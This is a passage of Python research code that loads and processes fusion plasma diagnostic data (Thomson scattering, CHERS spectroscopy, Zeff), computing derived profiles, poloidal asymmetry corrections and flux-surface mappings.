for ch in diag[sys]:\n R.append(ch['R'].values)\n Z.append(ch['Z'].values)\n T.append(ch['time'].values)\n I.append(slice(nt, nt+len(T[-1])))\n nt += len(T[-1])\n #empty diag\n if nt == 0:\n continue\n \n R,Z,T = np.hstack(R)[:,None], np.hstack(Z)[:,None],np.hstack(T)\n \n else:\n R = diag[sys]['R'].values\n Z = diag[sys]['Z'].values\n T = diag[sys]['time'].values\n \n #do mapping \n rho = self.eqm.rz2rho(R+dr,Z+dz,T,self.rho_coord)\n try:\n if isinstance(diag[sys], list):\n for ch,ind in zip(diag[sys],I):\n ch['rho'].values = rho[ind,0]\n elif 'rho' in diag[sys]:\n diag[sys]['rho'].values = rho \n else:\n diag[sys]['rho'] = xarray.DataArray(rho, dims=['time','channel'])\n \n except Exception as e:\n print('Error eq_mapping')\n printe(e)\n embed()\n \n diag['EQM'] = Tree({'id':id(self.eqm),'dr':np.mean(dr), 'dz':np.mean(dz),'ed':self.eqm.diag})\n\n return diag\n \n \n \n def __call__(self, quantity=[], options=None,spline_fits=False, tbeg=0, tend=10 ):\n \n if spline_fits:\n return self.load_splines()\n \n \n if quantity == 'elms':\n return self.load_elms(options)\n \n \n if quantity == 'sawteeth':\n return self.load_sawteeth()\n \n if quantity == 'mhd_modes':\n return self.load_mode_loc()\n \n \n \n T = time()\n\n \n options = options[quantity]\n \n\n\n \n systems = []\n if quantity in ['Ti', 'omega', 'nC6','Mach','Te/Ti','Zeff']:\n systems.append('CHERS')\n \n \n if quantity in ['Te', 'ne']:\n for sys, stat in options['systems']['TS system']:\n if stat.get(): systems.append(sys)\n \n data = []\n if quantity in ['Te', 'ne', ]:\n data.append(self.load_ts(tbeg, tend, systems, options['load_options']['TS system']))\n\n if quantity in ['Ti', 'omega', 'nC6'] and len(systems) > 0:\n data.append(self.load_cer(tbeg,tend, systems,options['load_options']['CER system']))\n \n \n #derived 
quantities\n if quantity == \"Mach\":\n cer = self.load_cer(tbeg,tend,['CHERS'],options['load_options']['CER system']) \n from scipy.constants import e,m_u\n Mach = deepcopy(cer)\n \n omg = cer['CHERS']['omega'].values\n omg_err = cer['CHERS']['omega_err'].values\n ti = np.copy(cer['CHERS']['Ti'].values)\n ti_err = cer['CHERS']['Ti_err'].values\n r = cer['CHERS']['R'].values\n t = cer['CHERS']['time'].values\n Mach['CHERS'] = cer['CHERS'].drop(['omega','omega_err','Ti','Ti_err'])\n\n vtor = omg*r\n vtor_err = omg_err*r\n ti[ti<=0] = 1 #avoid zero division\n vtor[vtor==0] = 1 #avoid zero division\n mach = np.sqrt(2*m_u/e*vtor**2/(2*ti))\n mach_err = mach*np.hypot(vtor_err/vtor,ti_err/ti/2.)*np.sign(ti_err)\n \n #mach number profile is not a flux function, use just LFS value\n R0 = np.interp(t ,self.eqm.t_eq, self.eqm.ssq['Rmag'])\n mach_err[r < R0[:,None]] *= -1\n \n #deuterium mach number \n Mach['CHERS']['Mach'] = xarray.DataArray(mach, dims=['time','channel'], attrs={'units':'-','label':'M_D'})\n Mach['CHERS']['Mach_err'] = xarray.DataArray(mach_err, dims=['time','channel'])\n \n \n data.append(Mach)\n \n\n if quantity == \"Te/Ti\" :\n TS = self.load_ts(tbeg,tend,['LFS','HFS'] )\n CER = self.load_cer(tbeg,tend, systems ,options['load_options']['CER system'] )\n\n R_Te,tvec_Te,data_Te,err_Te = [],[],[],[]\n \n for sys in TS['systems']:\n if sys not in TS: continue \n t = TS[sys]['time'].values\n te = TS[sys]['Te'].values\n e = TS[sys]['Te_err'].values\n r = TS[sys]['R'].values\n r,t = np.meshgrid(r,t)\n \n ind = np.isfinite(e)|(te>0)|(e>0)\n tvec_Te.append(t[ind])\n data_Te.append(te[ind])\n err_Te.append(e[ind])\n R_Te.append(r[ind]) \n \n R_Te = np.hstack(R_Te)\n tvec_Te = np.hstack(tvec_Te)\n data_Te = np.hstack(data_Te)\n err_Te = np.hstack(err_Te)\n\n interp = LinearNDInterpolator(np.vstack((tvec_Te,R_Te)).T, np.copy(data_Te),fill_value=-100)\n Te_Ti = deepcopy(CER)\n for sys in CER['systems']:\n if sys not in CER: continue\n \n r = CER[sys]['R'].values\n t = CER[sys]['time'].values\n r,t = np.meshgrid(r,t)\n \n interp.values[:] = np.copy(data_Te)[:,None] \n Te = np.single(interp(t,r))\n \n interp.values[:] = np.copy(err_Te)[:,None] \n Te_err = np.single(interp(t,r))\n \n Ti = CER[sys]['Ti'].values\n Ti_err = CER[sys]['Ti_err'].values\n \n TeTi_err = Te/(Ti+1)*np.hypot(Te_err/(Te+1),Ti_err/(Ti+1))\n TeTi_err[Ti_err < 0] = -np.infty\n Te_Ti[sys] = CER[sys].drop(['Ti','Ti_err','omega','omega_err','nC6','nC6_err'])\n Te_Ti[sys]['Te/Ti'] = xarray.DataArray(Te/(Ti+1),dims=['time','channel'], attrs={'units':'-','label':'T_e/T_i'})\n Te_Ti[sys]['Te/Ti_err'] = xarray.DataArray(TeTi_err,dims=['time','channel'])\n\n \n data.append(Te_Ti)\n \n \n \n if quantity == \"Zeff\" :\n \n Zeff = self.RAW['Zeff'] = Tree()\n Zeff.setdefault('diag_names',Tree())\n Zeff['systems'] = []\n \n if options['systems']['CER system'][0][1].get():\n\n TS = self.load_ts(tbeg,tend,['LFS','HFS'],options['load_options']['CER system'] )\n try:\n CER = self.load_cer(tbeg,tend, systems ,options['load_options']['CER system'] )\n except:\n printe('Loading of CHERS data failed')\n else:\n R_ne,tvec_ne,data_ne,err_ne = [],[],[],[]\n for sys in TS['systems']:\n if sys not in TS: continue \n t = TS[sys]['time'].values\n ne = TS[sys]['ne'].values\n e = TS[sys]['ne_err'].values\n r = TS[sys]['R'].values\n r,t = np.meshgrid(r,t)\n ind = np.isfinite(e)|(ne>0)|(e>0)\n tvec_ne.append(t[ind])\n data_ne.append(ne[ind])\n err_ne.append(e[ind])\n R_ne.append(r[ind]) \n \n R_ne = np.hstack(R_ne)\n tvec_ne = np.hstack(tvec_ne)\n data_ne = 
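# A quick numeric sanity check (illustrative values, not shot data) of the
# Mach expression used in the "Mach" branch above, M = v_tor / sqrt(2*e*Ti/m)
# with m = 2*m_u for deuterium:
#   v_tor = 2e5 m/s, Ti = 1e3 eV
#   np.sqrt(2*m_u/e * v_tor**2 / (2*Ti)) ~= 0.64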
np.hstack(data_ne)\n err_ne = np.hstack(err_ne)\n interp = LinearNDInterpolator(np.vstack((tvec_ne,R_ne)).T, np.copy(data_ne),fill_value=-100)\n\n Zeff['systems']+= CER['systems']\n\n #Zeff = deepcopy(CER)\n for sys in CER['systems']:\n if sys not in CER: continue\n \n\n r = CER[sys]['R'].values\n t = CER[sys]['time'].values\n r,t = np.meshgrid(r,t)\n \n interp.values[:] = np.copy(data_ne)[:,None] \n ne = np.single(interp(t,r))\n \n interp.values[:] = np.copy(err_ne)[:,None] \n ne_err = np.single(interp(t,r))\n \n nC = CER[sys]['nC6'].values\n nC_err = CER[sys]['nC6_err'].values\n \n fC = nC/(ne+1)\n \n Zimp, Zmain = 6,1\n valid = (nC_err > 0)&np.isfinite(nC_err)\n zeff = Zimp*(Zimp - Zmain)*fC + Zmain\n zeff_err = np.ones_like(zeff)\n zeff_err[valid] = (zeff[valid]-Zmain)*np.hypot(ne_err/(ne+1),nC_err/(nC+1))[valid]\n zeff_err[~valid] = -np.infty\n \n Zeff['diag_names'][sys] = ['CHERS'] \n Zeff[sys] = CER[sys].drop(['Ti','Ti_err','omega','omega_err','nC6','nC6_err'])\n Zeff[sys]['Zeff'] = xarray.DataArray(zeff,dims=['time','channel'], attrs={'units':'-','label':'Z_\\mathrm{eff}'})\n Zeff[sys]['Zeff_err'] = xarray.DataArray(zeff_err,dims=['time','channel'])\n \n if options['systems']['VB Zeff'][0][1].get():\n try:\n tree = 'PASSIVESPEC' \n self.MDSconn.openTree(tree, self.shot)\n VB_Zeff = self.MDSconn.get('_x=\\\\'+tree+'::TOP.VISIBLEBREM:Z_EFFECTIVE').data()\n VB_tvec = self.MDSconn.get('dim_of(_x,0)').data()\n \n \n self.MDSconn.closeTree(tree, self.shot)\n ind = (VB_Zeff < 6)&(VB_Zeff > 1)\n VB_Zeff = VB_Zeff[ind]\n VB_tvec = VB_tvec[ind]\n\n Zeff['VB Zeff'] = VB = Dataset('Zeff_VB.nc', attrs={'system':'VB Zeffs'})\n VB['Zeff'] = xarray.DataArray(VB_Zeff,dims=['time'], attrs={'units':'-','label':'Z_\\mathrm{eff}'})\n VB['Zeff_err'] = xarray.DataArray(VB_Zeff*.1,dims=['time'], attrs={'units':'-','label':'Z_\\mathrm{eff}'})\n #location is just a guess\n VB['rho'] = xarray.DataArray(np.zeros_like(VB_tvec)+.1,dims=['time'] )\n VB['diags']= xarray.DataArray(np.tile(('VB Zeff',), VB_tvec.size),dims=['time']) \n VB['time'] = xarray.DataArray(VB_tvec,dims=['time'], attrs={'units':'s'})\n\n #Zeff['systems'].append('VB')\n Zeff['diag_names']['VB Zeff']=['VB Zeff'] \n Zeff['systems']+= ['VB Zeff']\n\n except Exception as e:\n print('VB Zeff error ',e)\n pass\n \n data.append(Zeff)\n \n \n \n \n \n #list of datasets \n output = {'data':[],'diag_names':[]}\n times = []\n for d in data:\n if d is None or not 'systems' in d: continue\n for sys in d['systems']:\n if not sys in d: continue\n if isinstance(d[sys], list):\n for dd in d[sys]:\n if quantity in dd:\n output['data'].append(dd)\n elif quantity in d[sys]:\n output['data'].append(d[sys])\n output['diag_names'].extend(d['diag_names'][sys])\n\n #cut data in the selected range\n for i in range(len(output['data'])):\n times.append(output['data'][i]['time'].values)\n try:\n output['data'][i]= output['data'][i].sel(time=slice(tbeg,tend))\n except:\n #no data in the requested range \n continue\n if len(output['diag_names']) == 0 or len(output['data'])==0:\n tkinter.messagebox.showerror('No data loaded',\n 'No data were loaded. 
Try to change the loading options ' +str(len(output['diag_names']))+' '+str(len(output['data'])))\n return \n \n \n output['tres']=np.median(np.round(np.diff(np.hstack(times))*1e3,1))/1e3\n output['tres']=round(output['tres'],6)\n if output['tres'] == 0: output['tres'] = 0.01\n output['rho_lbl'] = self.rho_coord\n \n return output\n\n\n\n \n def load_splines(self):\n \n \n \n \n if 'SPLINES' in self.RAW: \n return self.eq_mapping(self.RAW['SPLINES'])\n\n \n TT = time()\n print_line(' * Fetching SPLINES ... ')\n \n tree = 'ACTIVESPEC'\n chers_edition = 'CT1'\n chers_signals = ['ZEFFS', 'VTS','TIS', 'NCS', 'RS', 'TIME']\n TDI = [f'\\\\{tree}::TOP.CHERS.ANALYSIS.{chers_edition}:{sig}' for sig in chers_signals]\n mdts_signals = ['SPLINE_NE','SPLINE_TE', 'SPLINE_RADII','TS_TIMES']\n TDI += [f'\\\\{tree}::TOP.MPTS.OUTPUT_DATA.BEST:'+sig for sig in mdts_signals]\n\n Zeff,Vtor,Ti, nC, R,T, TS_ne,TS_Te,TS_R,TS_T = mds_load(self.MDSconn, TDI, tree, self.shot)\n print('\\t done in %.1fs'%(time()-TT))\n\n #use SI units!!\n Vtor *= 1e3 #m/s\n Ti *= 1e3 #eV\n TS_Te *= 1e3 #eV\n TS_ne *= 1e6 #m^3\n nC *= 1e6 #m^3\n \n R /= 100 #m\n TS_R /= 100 #m\n \n \n invalid = Ti <= 0\n \n Vtor[invalid] = np.nan\n Ti[invalid] = np.nan\n nC[invalid] = np.nan\n Zeff[invalid] = np.nan\n Ti= np.maximum(Ti,10)\n\n ##hydrogen Mach number \n from scipy.constants import e,m_u\n mach = np.sqrt(2*m_u/e*Vtor**2/(2*Ti))\n \n #truncate maximum mach number\n mach = np.minimum(mach,1)\n\n\n #Map Te on CHERS radial and temporal base\n Te_Ti = RectBivariateSpline(TS_R, TS_T, TS_Te,kx=1,ky=1)(R,T).T.astype('single')/Ti\n\n \n self.RAW['SPLINES'] = splines = Tree()\n \n splines['Te'] = splines['ne'] = ds = Dataset('spline_TS.nc')\n ds['ne'] = xarray.DataArray(TS_ne.T, dims=['time','R'])\n ds['Te'] = xarray.DataArray(TS_Te.T, dims=['time','R'])\n ds['Z'] = xarray.DataArray(TS_R*0, dims=['R'])\n ds['R'] = xarray.DataArray(TS_R, dims=['R'])\n ds['time'] = xarray.DataArray(TS_T, dims=['time'])\n \n ds = Dataset('spline_CHERS.nc') \n splines['Zeff'] = splines['Mach'] = splines['Ti'] = splines['nC6'] = splines['Te/Ti'] = splines['omega'] = ds\n ds['Ti'] = xarray.DataArray(Ti, dims=['time','R'])\n ds['Zeff'] = xarray.DataArray(Zeff, dims=['time','R'])\n ds['nC6'] = xarray.DataArray(nC, dims=['time','R'])\n ds['omega'] = xarray.DataArray(Vtor/R, dims=['time','R'])\n ds['Mach'] = xarray.DataArray(mach, dims=['time','R'])\n ds['Te/Ti'] = xarray.DataArray(Te_Ti, dims=['time','R'])\n ds['Z'] = xarray.DataArray(R*0, dims=['R'])\n ds['R'] = xarray.DataArray(R, dims=['R'])\n ds['time'] = xarray.DataArray(T, dims=['time'])\n \n print('\\t done in %.1fs'%(time()-TT))\n \n splines['systems'] = ['Te','Ti','Zeff','ne','nC6','omega','Te/Ti','Mach']\n \n \n self.eq_mapping(splines)\n \n \n splines['EQM'] = Tree({'id':id(self.eqm),'dr':0, 'dz':0,'ed':self.eqm.diag})\n\n\n \n return splines\n \n \n \n \n \n\n def load_asymmetry(self,chers_edition='CT1',dR=0):\n \n \n self.RAW.setdefault('Asymmetry',Tree())\n asym = self.RAW['Asymmetry']\n\n A = 2 #Main ion mass\n Z = 1 #Main ion charge\n Zc = 6 #C charge\n Ac = 12 #C mass\n \n #calculate asymmetry correction factors on CHERS timebase as function of R?\n splines = self.load_splines()\n \n EQM = Tree({'id':id(self.eqm),'ed':self.eqm.diag})\n \n if 'EQM' not in asym or EQM != asym['EQM']:\n asym['EQM'] = EQM\n \n rho_grid = np.linspace(0,1,102)[1:]\n theta_grid = np.linspace(0,np.pi*2,50,endpoint=False)\n #get flux surfaces \n T = splines['Mach']['time'].values\n R,Z = 
self.eqm.rhoTheta2rz(rho_grid,theta_grid,T,coord_in=self.rho_coord, n_line=101)\n \n # calculate elemental dV for each R,Z\n dRdZ = np.array((np.gradient(Z,axis=[1,2]), \n np.gradient(R,axis=[1,2]))).T\n \n dV = 2*np.pi*R*np.linalg.det(dRdZ).T\n \n asym['FSA'] = FSA = Dataset('FSA.nc')\n FSA['dV'] = xarray.DataArray(dV,dims=['time','theta','rho'], attrs={'units':'m^3'})\n FSA['R'] = xarray.DataArray(R,dims=['time','theta','rho'], attrs={'units':'m'})\n FSA['Z'] = xarray.DataArray(Z,dims=['time','theta','rho'], attrs={'units':'m'})\n FSA['Rlfs'] = xarray.DataArray(R[:,0],dims=['time','rho'], attrs={'units':'m'})\n FSA['rho'] = xarray.DataArray(rho_grid,dims=['rho'], attrs={'units':'-'})\n FSA['theta'] = xarray.DataArray(theta_grid,dims=['theta'], attrs={'units':'rad'})\n FSA['time'] = xarray.DataArray(T,dims=['time'], attrs={'units':'s'})\n \n \n \n #load from cache \n FSA = asym['FSA']\n sepR = np.hstack([sr[sr > 0] for sr in self.eqm.separatrixR]) \n Rgrid = np.linspace(sepR.min(),sepR.max(),100)\n\n \n mach = splines['Mach']['Mach'].values/np.sqrt(2) #hydrogen Mach number \n Te_Ti = splines['Te/Ti']['Te/Ti'].values\n Zeff = splines['Zeff']['Zeff'].values\n spline_R = splines['Mach']['R'].values\n spline_T = splines['Mach']['time'].values\n \n \n \n Aeff = Zeff*A #effective ion mass estimated from zeff, valid for D+C\n asym_factor_e = 1/(1+Zeff*Te_Ti)* Aeff * mach**2\n asym_factor_c = (1-Zc/Ac* Aeff*Te_Ti/(1+Zeff*Te_Ti))*Ac*mach**2\n\n \n valid = np.isfinite(asym_factor_c)\n\n rho_grid = self.eqm.rz2rho(Rgrid,Rgrid*0,spline_T,self.rho_coord)\n spline_rho = self.eqm.rz2rho(spline_R,spline_R*0,spline_T,self.rho_coord)\n\n \n ne0_ne = np.zeros((len(spline_T), len(Rgrid)),dtype='single')\n nc0_nc = np.zeros((len(spline_T), len(Rgrid)),dtype='single')\n\n nefsa_ne = np.zeros((len(spline_T), len(Rgrid)),dtype='single')\n ncfsa_nc = np.zeros((len(spline_T), len(Rgrid)),dtype='single')\n\n for it in range(len(spline_T)):\n #find index closest to magnetic axis\n imin = np.argmin(rho_grid[it])\n \n #use only LFS CHERS data, HFS are often too poor\n valid[it] &= spline_R > Rgrid[imin]\n \n #LFS R for each radial location \n Rlfs_grid = np.interp(rho_grid[it], rho_grid[it,imin:], Rgrid[imin:]+dR)\n \n\n #interpolate asymmetry factors on the LFS radial grid\n asym_factor_e_ = np.interp(Rlfs_grid, spline_R[valid[it]], asym_factor_e[it][valid[it]],right=0)\n asym_factor_c_ = np.interp(Rlfs_grid, spline_R[valid[it]], asym_factor_c[it][valid[it]],right=0)\n\n dR2 = (Rgrid/Rlfs_grid)**2-1\n \n #ratio between LFS and local density\n ne0_ne[it] = np.exp(-asym_factor_e_*dR2)\n nc0_nc[it] = np.exp(-asym_factor_c_*dR2)\n \n \n \n i_eq = np.argmin(np.abs(spline_T[it]-FSA['time'].values))\n #interpolate asymmetry factors on the LFS radial grid\n R = FSA['R'].values[i_eq]\n Rlfs = FSA['Rlfs'].values[i_eq]\n rho = FSA['rho'].values\n\n asym_factor_e_ = np.interp(rho, spline_rho[it,valid[it]], asym_factor_e[it,valid[it]])\n #plt.plot( spline_rho[it,valid[it]], asym_factor_e[it,valid[it]] )\n asym_factor_c_ = np.interp(rho, spline_rho[it,valid[it]], asym_factor_c[it,valid[it]])\n \n dR2 = (R/Rlfs)**2-1\n\n neR_ne0 = np.exp(asym_factor_e_[None]*dR2)\n ncR_nc0 = np.exp(asym_factor_c_[None]*dR2)\n \n #calculate flux surface average\n dV = FSA['dV'].values[i_eq]\n \n \n #ratio between FSA and LFS density\n nefsa_ne0 = np.average(neR_ne0,0, dV)\n ncfsa_nc0 = np.average(ncR_nc0,0, dV) \n \n #ratio between FSA and local density\n nefsa_ne[it] = np.interp(Rlfs_grid, Rlfs, nefsa_ne0)*ne0_ne[it]\n ncfsa_nc[it] = 
np.interp(Rlfs_grid, Rlfs, ncfsa_nc0)*nc0_nc[it]\n \n asym['correction'] = corr = Dataset('asym_correction.nc')\n corr['ne0_ne'] = xarray.DataArray(ne0_ne,dims=['time','Rgrid'], attrs={'units':'-'})\n corr['nc0_nc'] = xarray.DataArray(nc0_nc,dims=['time','Rgrid'], attrs={'units':'-'})\n corr['nefsa_ne'] = xarray.DataArray(nefsa_ne,dims=['time','Rgrid'], attrs={'units':'-'})\n corr['ncfsa_nc'] = xarray.DataArray(ncfsa_nc,dims=['time','Rgrid'], attrs={'units':'-'})\n corr['time'] = xarray.DataArray(spline_T,dims=['time'], attrs={'units':'s'})\n corr['Rgrid'] = xarray.DataArray(Rgrid,dims=['Rgrid'], attrs={'units':'m'})\n \n return corr\n \n\n def load_cer(self,tbeg,tend, systems, options=None):\n #load Ti and omega at once\n TT = time()\n rshift = 0\n cf_correction = 'None'\n edition = 'CT1'\n\n tree = 'ACTIVESPEC'\n if options is not None:\n selected,editions = options['Analysis']\n edition = selected.get()\n if 'Position error' in options:\n rshift = options['Position error']['R shift [cm]'].get()/100. #[m] \n if 'Poloidal asymmetry correction' in options:\n cf_correction = options['Poloidal asymmetry correction'][0].get()\n\n \n #TODO check if data exists at all!\n if edition is None:\n raise Exception('No CHERS analysis data')\n \n #Ti below 300eV is unreliable??\n \n self.RAW.setdefault('CHERS',Tree())\n cer = self.RAW['CHERS'].setdefault(edition,Tree())\n\n #load from cache if possible\n cer.setdefault('diag_names',Tree())\n cer['systems'] = systems\n \n #load only new systems\n load_systems = list(set(systems)-set(cer.keys()))\n \n #update equilibrium for already loaded systems\n cer = self.eq_mapping(cer, dr=rshift)\n \n \n if len(load_systems) == 0 and np.all([cer[sys].attrs['cf_correction'] == cf_correction for sys in cer['systems']]):\n return cer\n \n \n print_line( ' * Fetching CHERS '+edition.upper()+' data ...' 
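# Descriptive note on the rotation model used by load_asymmetry() above: on a
# flux surface the density varies as n(R) = n(R_lfs) * exp(lambda*((R/R_lfs)**2 - 1)),
# where lambda is the species asymmetry factor built from the Mach number and
# the Zeff*Te/Ti electron-pull term; the 'LFS' option rescales measurements to
# the low-field-side midplane value, 'FSA' to the flux-surface average using
# the dV weights stored in asym['FSA'].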
)\n \n #AW, AWB active and background amplitude, unknown units \n data = {\n 'Ti': {'label':'Ti','unit':'eV','sig':['ZTI','DTI'],'scale':1e3},\n 'omega': {'label':r'\\omega_\\varphi','unit':'rad/s','sig':['VT','DVT'],'scale':1e3},\n #'omega': {'label':r'\\omega_\\varphi','unit':'kHz','sig':['VT','DVT'],'scale':1/(2*np.pi)},\n 'nimp': {'label':r'n_c','unit':'m^{-3}','sig':['NC','DNC'],'scale':1e6},\n }\n \n #list of MDS+ signals for each channel\n signals = data['Ti']['sig']+data['omega']['sig']+data['nimp']['sig']+['RADIUS', 'TIME', 'VALID']\n\n \n\n TDI = []\n #prepare list of loaded signals\n for sig in signals:\n TDI.append( '\\\\'+tree+'::TOP.CHERS.ANALYSIS.'+edition+':'+sig)\n\n Ti,Tierr,Vtor,Vtorerr,Nc,Nc_err,R,tvec,valid = mds_load(self.MDSconn,TDI, tree, self.shot) \n \n if len(tvec) == 0:\n raise Exception('No CHERS analysis data')\n\n \n Z = R*0\n R /= 100 #[m]\n\n valid = np.bool_(valid)\n \n #map to radial coordinate \n rho = self.eqm.rz2rho(R+rshift,Z,tvec,self.rho_coord)\n \n \n #show these points but ignore them in the fit\n valid &= np.isfinite(Nc > 0)&np.isfinite(Nc_err)\n valid[valid] &= (Ti[valid] > 0)&(Tierr[valid] > 0)\n valid[valid] &= (Nc[valid] > 0)&(Nc_err[valid] > 0)\n\n #valid = np.bool_(valid)\n Tierr[~valid] = -np.inf\n Vtorerr[~valid] = -np.inf\n channel = np.arange(len(R))\n \n omega = Vtor/R\n omega_err = Vtorerr/R\n \n #guess of nC errorbars from time scatter\n Nc_ = np.ma.array(Nc, mask=~valid)\n Nc_err[:] = np.ma.median(np.abs(np.diff(Nc_,axis=0)),axis=0).data\n Nc_err[~valid] = -np.inf\n\n \n if cf_correction != 'None':\n corr = self.load_asymmetry(chers_edition=edition,dR=rshift)\n if cf_correction == 'LFS':\n nratio = corr['nc0_nc'].values \n elif cf_correction == 'FSA':\n nratio = corr['ncfsa_nc'].values \n else:\n raise Exception('Asymmetry correction '+cf_correction+' is not supported')\n\n corr = RectBivariateSpline(corr['time'].values,corr['Rgrid'].values, nratio)(tvec,R)\n\n Nc[valid] *= corr[valid]\n Nc_err[valid] *= corr[valid]\n \n \n\n for sys in systems:\n cer['diag_names'][sys]=['CHERS'] \n cer[sys] = Dataset('CHERS_'+sys+'.nc',attrs={ 'system':sys, 'cf_correction': cf_correction})\n cer[sys]['Ti'] = xarray.DataArray(Ti*data['Ti']['scale'],dims=['time','channel'],\n attrs={'units':data['Ti']['unit'],'label':'T_i'})\n cer[sys]['Ti_err'] = xarray.DataArray(Tierr*data['Ti']['scale'],dims=['time','channel'] )\n \n cer[sys]['omega'] = xarray.DataArray(omega*data['omega']['scale'],dims=['time','channel'],\n attrs={'units':data['omega']['unit'],'label':r'\\omega_\\phi'})\n cer[sys]['omega_err'] = xarray.DataArray(omega_err*data['omega']['scale'],dims=['time','channel'])\n \n cer[sys]['nC6'] = xarray.DataArray(Nc*data['nimp']['scale'],dims=['time','channel'], \n attrs={'units': data['nimp']['unit'],'label':r'n_{C^{6+}}'})\n cer[sys]['nC6_err'] = xarray.DataArray(Nc_err*data['nimp']['scale'],dims=['time','channel'])\n \n cer[sys]['diags']= xarray.DataArray( np.tile(('CHERS',), Ti.shape),dims=['time','channel']) \n\n cer[sys]['R'] = xarray.DataArray(R, dims=['channel'], attrs={'units':'m'})\n cer[sys]['Z'] = xarray.DataArray(Z, dims=['channel'], attrs={'units':'m'})\n cer[sys]['rho'] = xarray.DataArray(rho,dims=['time','channel'], attrs={'units':'-'})\n cer[sys]['time'] = xarray.DataArray(tvec,dims=['time'], attrs={'units':'s'})\n cer[sys]['channel'] = xarray.DataArray(channel,dims=['channel'], attrs={'units':'-'})\n \n\n \n cer['EQM'] = Tree({'id':id(self.eqm),'dr':rshift, 'dz':0,'ed':self.eqm.diag})\n print('\\t done in %.1fs'%(time()-TT))\n \n 
return cer\n \n \n \n \n \n def load_ts(self, tbeg,tend,systems, options=None):\n \n T = time()\n\n revision = 'BEST'\n rshift = 0\n cf_correction = 'None'\n if options is not None:\n if 'TS revision' in options:\n selected,revisions = options['TS revision']\n revision = selected.get()\n if 'Position error' in options:\n rshift = options['Position error']['R shift [cm]'].get()/100. #[m] \n if 'Poloidal asymmetry correction' in options:\n cf_correction = options['Poloidal asymmetry correction'][0].get()\n \n\n #use cached data\n self.RAW.setdefault('TS',Tree())\n ts = self.RAW['TS'].setdefault(revision,Tree({'systems':systems}))\n\n ts['systems'] = list(systems)\n systems = list(set(systems)-set(ts.keys()))\n\n \n \n \n #update mapping of the cached data\n ts = self.eq_mapping(ts, dr =rshift) \n ts.setdefault('diag_names',Tree())\n \n if len(systems) == 0 and np.all([ts[sys].attrs.get('cf_correction','') == cf_correction for sys in ts['systems']]):\n #assume that equilibrium could be changed\n return ts\n else:\n systems = ts['systems']\n\n print_line( ' * Fetching TS data ...')\n\n \n signals = 'FIT_NE', 'FIT_NE_ERR', 'FIT_TE', 'FIT_TE_ERR','TS_TIMES','FIT_RADII'\n \n \n \n tree = 'ACTIVESPEC'\n #prepare list of loaded signals\n tdi = '\\\\%s::TOP.MPTS.OUTPUT_DATA.%s:'%(tree,revision)\n TDI = [tdi+sig for sig in signals]\n\n ne,ne_err,Te,Te_err,tvec,R = mds_load(self.MDSconn, TDI, tree, self.shot)\n R /= 100 #m\n Z = R*0\n Te *= 1e3 #eV\n Te_err *= 1e3 #eV\n ne *= 1e6 #m^-3\n ne_err *= 1e6 #m^-3\n \n \n #these points will be ignored and not plotted (negative errorbars )\n invalid = (Te_err<=0) | (Te <=0 ) | (ne_err<=0) | (ne <=0 )\n Te_err[invalid] = -np.infty\n ne_err[invalid] = -np.infty\n \n channel = np.arange(len(R))\n\n rho = self.eqm.rz2rho(R+rshift,Z,tvec,self.rho_coord)\n \n \n if cf_correction != 'None':\n corr = self.load_asymmetry(dR=rshift)\n if cf_correction == 'LFS':\n nratio = corr['ne0_ne'].values \n if cf_correction == 'FSA':\n nratio = corr['nefsa_ne'].values \n\n corr = RectBivariateSpline(corr['time'].values,corr['Rgrid'].values, nratio)(tvec,R).T\n\n ne[~invalid] *= corr[~invalid]\n ne_err[~invalid] *= corr[~invalid]\n \n \n \n imin = np.argmin(rho.mean(0))\n index = {'HFS':slice(0,imin), 'LFS':slice(imin,None)}\n for sys in systems:\n ind = index[sys]\n ts['diag_names'][sys]=['TS:'+sys]\n\n ts[sys] = Dataset( 'TS:'+sys+'.nc' ,attrs={'system':sys, 'cf_correction': cf_correction})\n ts[sys]['ne'] = xarray.DataArray(ne[ind].T,dims=['time','channel'], attrs={'units':'m^{-3}','label':'n_e'})\n ts[sys]['ne_err'] = xarray.DataArray(ne_err[ind].T,dims=['time','channel'], attrs={'units':'m^{-3}'})\n ts[sys]['Te'] = xarray.DataArray(Te[ind].T,dims=['time','channel'], attrs={'units':'eV','label':'T_e'})\n ts[sys]['Te_err'] = xarray.DataArray(Te_err[ind].T,dims=['time','channel'], attrs={'units':'eV'})\n ts[sys]['diags']= xarray.DataArray( np.tile(('TS:'+sys,), ne[ind].T.shape),dims=['time','channel']) \n ts[sys]['R'] = xarray.DataArray(R[ind], dims=['channel'], attrs={'units':'m'})\n ts[sys]['Z'] = xarray.DataArray(Z[ind],dims=['channel'], attrs={'units':'m'})\n ts[sys]['rho'] = xarray.DataArray(rho[:,ind],dims=['time','channel'], attrs={'units':'-'})\n ts[sys]['time'] = xarray.DataArray(tvec,dims=['time'], attrs={'units':'s'})\n ts[sys]['channel'] = xarray.DataArray(channel[ind],dims=['channel'], attrs={'units':'-'})\n \n \n print('\\t done in %.1fs'%(time()-T))\n ts['EQM'] = Tree({'id':id(self.eqm),'dr':rshift, 'dz':0, 'ed':self.eqm.diag})\n\n return ts \n \n \n \n \n def 
load_elms(self,option):\n node = option['elm_signal'].get()\n elm_time, elm_val, elm_beg, elm_end = [],[],[],[]\n self.RAW['ELMS'] = Tree()\n self.RAW['ELMS'][node] = Tree({'tvec': elm_time, 'data':elm_val, \n 'elm_beg':elm_beg,'elm_end':elm_end,'signal':node})\n \n return self.RAW['ELMS'][node]\n \n\n def load_mode_loc(self,option=None):\n \n if 'MHDloc' in self.RAW and 'EQM' in self.RAW['MHDloc'] and self.RAW['MHDloc']['EQM']['id'] == id(self.eqm):\n return self.RAW['MHDloc']\n \n self.RAW['MHDloc'] = Tree()\n \n rho = np.linspace(0,1,100)\n q = np.abs(self.eqm.getQuantity(rho, 'QPSI', coord_in=self.rho_coord))\n \n modes = {'1/1':1, '2/1': 2, '3/1': 3, '4/1': 4,'5/1': 5, '3/2': 3/2, '4/3': 4/3}\n rho_modes = {}\n \n \n for name, qval in modes.items():\n rho_modes[name] = []\n for it,t in enumerate(self.eqm.t_eq):\n imin = np.argmin(q[it])\n rho_modes[name].append(np.interp(qval, q[it, imin:], rho[imin:], left=np.nan))\n rho_modes[name] = np.single(rho_modes[name])\n \n self.RAW['MHDloc']['tvec'] = self.eqm.t_eq\n self.RAW['MHDloc']['modes'] = rho_modes\n self.RAW['MHDloc']['EQM'] = Tree({'id':id(self.eqm),'dr':0, 'dz':0, 'ed':self.eqm.diag})\n\n return self.RAW['MHDloc']\n \n \n def load_sawteeth(self):\n return {'tvec':[]}\n \n \n \n \n \n \n\n \n \n \n 